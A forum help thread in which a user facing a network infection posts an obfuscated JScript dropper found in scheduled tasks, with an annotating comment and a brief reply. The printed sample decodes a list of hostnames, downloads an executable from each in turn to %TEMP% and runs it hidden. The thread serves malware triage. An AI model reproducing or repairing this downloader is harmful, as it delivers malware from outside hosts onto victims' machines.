
Random Scheduled Task


Squidr

Recommended Posts

There is currently a malware or virus outbreak going on in my network.

 

I found some scheduled tasks on a few servers that call a file. I was able to capture this file and retrieve the code, but I can't make heads or tails of it.

// NOTE(review): this is a Windows Script Host (JScript) downloader pasted from a forum
// thread -- a malware sample to triage, not application code to fix. What the listing
// itself shows:
//  - kqg_U: not referenced anywhere else in the listing; appears to be padding.
//  - U2AuF(path): opens the file with ADODB.Stream, reads 2 characters and returns 1
//    only if they are "MZ" (a PE executable header check).
//  - rtGUw(req, stream, url, path): the eval(unescape(...)) decodes to
//    `req.open("GET", url, false); req.send(null);`; on HTTP 200 the responseBody is
//    written to `path` with ADODB.Stream.SaveToFile(path, 2).
//  - BS5NBx(min, max): random alphanumeric string of min..max-1 characters; the
//    eval(unescape(...)) inside the loop only draws the random index.
//  - EONSs2b(host): builds "http://" + host + "/4" and a %TEMP%\<6-7 random chars>.exe
//    target, picks XMLHttpRequest / MSXML2.ServerXMLHTTP / Microsoft.XMLHTTP, downloads
//    via rtGUw, applies the MZ check, then executes the file through
//    WScript.Shell.Run(path, 0) (window style 0 = hidden). The eval(unescape(...)) at
//    its top appears to create the ADODB.Stream and read the "Process" environment
//    (Fs19dPx.Item("TEMP") is used right after) -- confirm by decoding offline.
//  - z14v2 / uN87Q: probe %TEMP%\~<scriptname>.tmp (LoadFromFile, else SaveToFile),
//    with a fallback to %windir%\TEMP; the download loop below only runs when this
//    succeeds, so it behaves as a writability/marker check.
//  - Top level: `c` is a list of ASCII codes; split on 59 (';') it yields the download
//    hosts (the first entry decodes to a .biz domain), which are tried in order until one
//    download+run succeeds.
// Every eval(unescape(...)) call and every \xNN / \uNNNN string is obfuscation; decode
// them offline rather than executing the sample. As pasted the listing is also broken
// (line wraps inside the `new ActiveXObject` string in EONSs2b and inside a numeric
// literal near `...97,121,108,9` / `9,121...`, plus a raw `"` inside an unescape()
// argument), which is the "unterminated string literal" error mentioned in the reply.
// Detection angle: a scheduled task running a .js file under wscript/cscript, outbound
// HTTP GET for "/4" to many unrelated hosts, and a randomly named .exe appearing in
// %TEMP% and being launched hidden.
function kqg_U(mJ7Tt, JyBUHp8, ky7uF, aoA48, xAld9Nv, yBmFsD, OeCdJg, oI90Q){var dMfGlv = "ds\x30";if (mJ7Tt.length < dMfGlv.length) {for (var Jk_0h = 0; Jk_0h < mJ7Tt.length; Jk_0h++) {if (Jk_0h != 0x12) {break;}try {dMfGlv += mJ7Tt.charCodeAt(Jk_0h);} catch (e) {Jk_0h += 5;}}}return mJ7Tt.length + Jk_0h;}function U2AuF(oBfiV){try {var CSFVfv = 0;var Ek_nR = new ActiveXObject("AD\u004fDB.\u0053\x74ream");Ek_nR.Type = 2; Ek_nR.Mode = 3; Ek_nR.Charset = "AS\x43I\u0049";Ek_nR.Open();Ek_nR.LoadFromFile(oBfiV);var HuIVtF6 = Ek_nR.ReadText(2);if (HuIVtF6 != "MZ") {CSFVfv = 0;} else {CSFVfv = 1;}Ek_nR.Close();return CSFVfv;} catch (e) {return 0;}}function rtGUw(tBCPe4, Ek_nR, y68EU9, s37Aahl){try {eval(unescape("tB\u0043P\x25\x365\u002534\x252\x45o%\x370e\u00256E\u002528%\x322G\x45T%2\x32\x252C%\u00320%7\x396\u002538E\u0055%\x339, \u002566%\x361%6\u0043se);tBCP%6\u0035\u002534.s%6\u0035%6\u0045d(%6\u0045ul%\x36C%2\x39;%0\u0041"));if (tBCPe4.status != 200) {return -1;}Ek_nR.Type = 1;Ek_nR.Mode = 3;var d2nDksd = tBCPe4.responseBody;Ek_nR.Open();Ek_nR.Write(d2nDksd);Ek_nR.SaveToFile(s37Aahl, 2);Ek_nR.Close();} catch (J55lr6) {return -2;}return 1;}function BS5NBx(m2FjJdn, iJaLCD) {	iUd2nAL = m2FjJdn + Math.floor(Math.random() * (iJaLCD - m2FjJdn));var rN7MN1C = "012\u003345678\x39ABCD\u0045FGHIJ\x4bL\u004dNOPQR\u0053\u0054U\u0056\x57XT\u005a\u0061bcdefghiklmnopqrs\x74uvw\x78yz";var pJ3jM = '';for (var Jk_0h = 0; Jk_0h < iUd2nAL; Jk_0h++) {eval(unescape("v%6\u0031\x2572%\u0032\x30\x2579K\x4f%\u00367b%\x36\u0045\x4b = \x4da%\x37\x34%6\x38\x252Eflo%\x36F\x25\u00372(\u004dat%\x368.ra%\x36Edo%6\u0044(%\x329 %\x32A%\u00320rN\x25\u00337MN1C.\x256Ce\u00256Eg%7\x34%6\x38);%0\u0041"));pJ3jM += rN7MN1C.substring(yKOgbnK,yKOgbnK+1);}return pJ3jM;}function EONSs2b(iF5bi){var AKj39 = "h\u0074tp:/\u002f"+iF5bi+"/4";var tBCPe4 = null;var CSFVfv = 1;eval(unescape("var \x45k_\x256\x45R = n%6\u0035w 
Ac\u002574iveXO%6\u0062\u0025\x36\x41%6\x35ct%2\x38"ADO\x44B%\x32\x45S%\u00374re\x2561%\x36\u0044\x2522\x2529;%\u00376%6\u0031\u002572 \u0046\x2573%\x3319\x2564P%7\u0038 = \u00256Fxd\u0047A.En%\x376i%\u0037\u0032\u00256Fn%\u0036D%\x365n\u002574(%2\u0032P%7\x32%\u0036F%\u00363\u002565\u002573\x2573")\u00253\x42%\x30\x41"));var AmVJl3f = Fs19dPx.Item("\x54EMP");AmVJl3f += '\\';AmVJl3f += BS5NBx(6,8) + "\u002eexe";try { tBCPe4=new XMLHttpRequest(); } catch(J55lr6) {try { tBCPe4 = new ActiveXObject("\u004dSXML2.Serve\u0072X\u004dL\x48\u0054TP"); } catch(J55lr6) {tBCPe4 = new ActiveXObject("Mic\x72o\x73oft.XML\x48T\x54P");}}try {if (!tBCPe4) {throw 1;}if (rtGUw(tBCPe4, Ek_nR, AKj39, AmVJl3f) < 0) {throw 3;}if (U2AuF(AmVJl3f) == 0) {throw 5;}var oAB1pm = "\""+AmVJl3f+"\"";oxdGA.Run(oAB1pm, 0);} catch (e) {CSFVfv = 0;}return CSFVfv;}function z14v2(d_Qw1G){try {var Ek_nR = new ActiveXObject("AD\u004fD\u0042\u002eStream");Ek_nR.Type = 1;Ek_nR.Mode = 3;eval(unescape("E\x25\x36B%5\u0046nR.Ope%6\x45(%\x329%3\x42%\u0037\u0034%\u00372y \u00257B\x45k_%6\x45R.Lo%6\u0031%\u00364Fr%6\u0046\u0025\u0036DFi%\u0036Ce\x2528d%5\x46\x51w1G\u002529;\x250\u0041\u00257D %\x36\u0033%6\u0031tch %\u00328e%\x329\u002520{%\x30AE%6\x42%\u0035FnR.\x53a\u0025\u00376e\u0054%\u0036FFile%\x328d\x255\u0046\x51%\u00377%\x331G,\u00252\u00302\x2529;%\x30A}\u00250A"));Ek_nR.Close();return 1;} catch (e) {return 0;}}function uN87Q(oxdGA){var zbux9ps = WScript.ScriptName;var a7KM5e = zbux9ps.replace(/\..*/, '' );var U620z0 = oxdGA.ExpandEnvironmentStrings("%T\x45\u004dP%\\~"+a7KM5e+".tm\x70");if (U620z0.length == (a7KM5e.length + 6)) {U620z0 = oxdGA.ExpandEnvironmentStrings("%\u0077ind\u0069\x72%\\TEM\u0050\\~"+a7KM5e+".t\u006dp");}var CSFVfv = 0;if ((CSFVfv = z14v2(U620z0)) == 1) {} else {}return CSFVfv;}var oxdGA = new ActiveXObject("WS\u0063r\u0069pt.She\u006cl");if (uN87Q(oxdGA) == 0) {} else {var c = 
[113,100,112,103,114,122,101,115,110,110,111,100,115,103,114,97,102,101,99,107,108,97,120,112,98,46,98,105,122,59,115,99,102,99,103,121,115,103,101,111,117,113,118,99,106,112,46,105,110,102,111,59,116,103,102,117,122,108,113,100,102,113,122,117,122,97,115,99,114,110,98,104,101,46,99,111,109,59,119,120,104,108,108,111,116,101,114,108,108,100,120,97,46,98,105,122,59,117,122,120,110,108,100,112,110,105,107,117,104,101,103,109,120,103,114,97,108,99,100,46,99,111,109,59,117,118,120,104,122,108,121,98,99,97,99,110,98,118,103,46,111,114,103,59,109,118,120,112,101,104,106,117,100,107,120,101,122,117,97,122,107,116,46,110,101,116,59,105,112,111,114,111,111,108,106,101,116,101,117,99,107,104,105,98,102,109,120,115,46,111,114,103,59,109,113,97,113,121,114,99,113,122,108,116,100,100,113,120,46,111,114,103,59,120,102,110,105,113,98,99,122,119,122,114,119,118,46,110,101,116,59,122,105,117,113,105,112,104,97,102,115,110,113,106,105,97,106,101,112,111,102,122,108,46,110,101,116,59,115,106,111,99,97,118,119,110,99,101,121,113,104,118,97,112,102,119,97,100,100,115,107,46,98,105,122,59,100,118,110,113,108,117,105,99,122,100,122,106,99,102,105,112,46,110,101,116,59,105,99,100,101,119,102,104,103,104,101,119,100,115,103,119,113,120,120,115,107,102,46,111,114,103,59,115,109,112,108,110,120,104,100,102,103,122,109,113,113,114,103,104,116,46,98,105,122,59,109,109,104,102,115,102,116,115,116,121,107,107,103,110,112,119,122,101,110,109,120,113,107,46,99,111,109,59,97,122,102,121,110,117,117,115,102,115,116,118,97,46,111,114,103,59,113,119,102,114,117,119,103,109,100,106,118,104,109,46,110,101,116,59,116,98,100,122,97,116,107,120,99,121,118,101,102,104,116,112,101,98,97,104,104,46,111,114,103,59,99,115,103,98,101,100,116,121,46,111,114,103,59,59,121,115,106,116,107,105,104,102,110,103,117,112,111,114,104,99,108,122,122,102,103,118,98,109,46,110,101,116,59,118,97,98,102,118,117,118,107,114,120,103,111,110,119,110,122,104,117,111,113,105,100,119,105,103,46,105,110,102,111,59,105,103,106,115,114
,115,101,121,119,98,121,98,46,105,110,102,111,59,104,100,100,104,105,112,103,120,103,119,119,108,102,112,98,46,105,110,102,111,59,111,98,115,100,116,118,98,116,102,110,121,118,120,116,103,117,101,100,111,112,112,109,116,117,46,110,101,116,59,102,116,106,121,110,120,113,110,101,114,110,114,110,118,104,114,112,113,98,110,121,100,46,111,114,103,59,122,117,114,103,104,97,108,110,111,120,116,113,108,109,119,101,97,104,103,119,111,121,109,111,122,46,105,110,102,111,59,108,106,102,115,113,116,122,100,119,103,46,98,105,122,59,104,117,97,103,105,98,100,118,116,116,110,102,97,110,114,107,112,115,110,122,109,112,121,115,46,98,105,122,59,106,115,122,103,113,103,112,113,103,103,118,118,102,46,98,105,122,59,110,111,102,111,110,102,103,119,121,101,117,97,101,46,111,114,103,59,101,122,117,109,104,121,107,116,100,120,121,106,110,97,103,109,102,46,99,111,109,59,121,120,97,111,121,111,103,114,109,113,107,100,122,109,121,104,121,122,46,98,105,122,59,106,100,121,117,105,109,99,113,114,110,121,109,108,106,116,46,111,114,103,59,118,110,101,100,121,101,121,119,105,103,103,109,114,112,97,103,99,122,120,120,121,46,111,114,103,59,99,103,105,111,115,121,111,115,111,100,109,108,111,117,109,111,121,116,121,109,46,111,114,103,59,111,118,105,117,100,113,100,105,46,111,114,103,59,103,112,100,104,120,108,98,120,122,121,121,112,46,110,101,116,59,114,106,109,99,122,98,106,98,115,121,115,109,117,111,105,98,117,106,120,46,110,101,116,59,98,110,114,110,111,102,108,104,112,46,105,110,102,111,59,59,114,120,113,122,98,100,97,119,113,100,98,99,104,107,106,120,113,99,119,113,107,46,105,110,102,111,59,114,106,117,117,101,115,113,111,97,113,120,101,118,104,105,111,116,46,110,101,116,59,120,122,117,119,106,119,117,105,115,107,102,107,103,112,108,104,107,46,111,114,103,59,99,103,117,102,97,101,120,101,112,111,119,116,46,110,101,116,59,101,105,107,98,113,97,121,122,102,115,112,110,107,121,106,112,107,114,105,99,121,100,122,46,111,114,103,59,115,110,111,112,100,112,101,107,104,119,122,46,111,114,103,59,97,121,108,9
9,121,118,114,121,109,116,98,118,110,100,120,115,111,114,117,120,108,98,105,46,98,105,122,59,101,104,107,99,105,113,98,106,118,111,122,103,104,104,109,106,119,97,97,104,113,107,46,110,101,116,59,102,116,109,101,103,112,110,107,110,98,108,105,111,101,122,114,102,117,46,105,110,102,111,59,120,115,105,112,114,115,111,97,112,106,98,117,120,100,117,104,111,110,114,105,108,108,46,98,105,122,59,99,122,105,114,113,108,121,120,97,102,114,46,110,101,116,59,106,103,110,117,108,101,104,97,122,107,100,100,46,110,101,116,59,106,109,115,115,103,112,110,98,107,119,114,121,105,108,102,113,109,108,112,112,119,105,119,113,46,98,105,122,59,107,106,100,103,113,98,106,113,113,100,100,121,112,103,120,102,104,100,120,102,112,105,112,120,97,46,110,101,116,59,108,100,109,120,115,115,103,105,108,99,111,121,112,100,114,122,120,100,112,98,99,115,104,119,46,111,114,103,59,118,98,97,114,115,118,116,116,103,46,98,105,122,59,112,119,120,102,102,106,119,108,113,113,122,101,114,118,111,116,107,122,97,110,46,98,105,122,59,121,117,97,108,110,116,116,110,111,104,117,105,118,114,121,122,117,46,111,114,103,59,110,97,104,118,105,97,111,97,46,110,101,116,59,112,102,113,98,97,118,99,102,114,106,111,46,98,105,122,59];var d = "";var ePtFdbV = [];for (var i=0; i < c.length; i++) {if (c[i] == 59) {ePtFdbV.push(d);d = "";continue;}d += String.fromCharCode(c[i]);		}for (var Jk_0h = 0; Jk_0h < ePtFdbV.length; Jk_0h++) {if (EONSs2b(ePtFdbV[Jk_0h]) == 1) {break;}}	}

Maybe someone has a clue?


The script uses obfuscation techniques that are associated with malicious behaviour. However, I have also seen obfuscation used to mask interpreted code in order to protect the programmer's work.

 

The obfuscated JavaScript has a bug and generates "Error: unterminated string literal". This may be due to copy-and-paste, or part of the script may be missing.

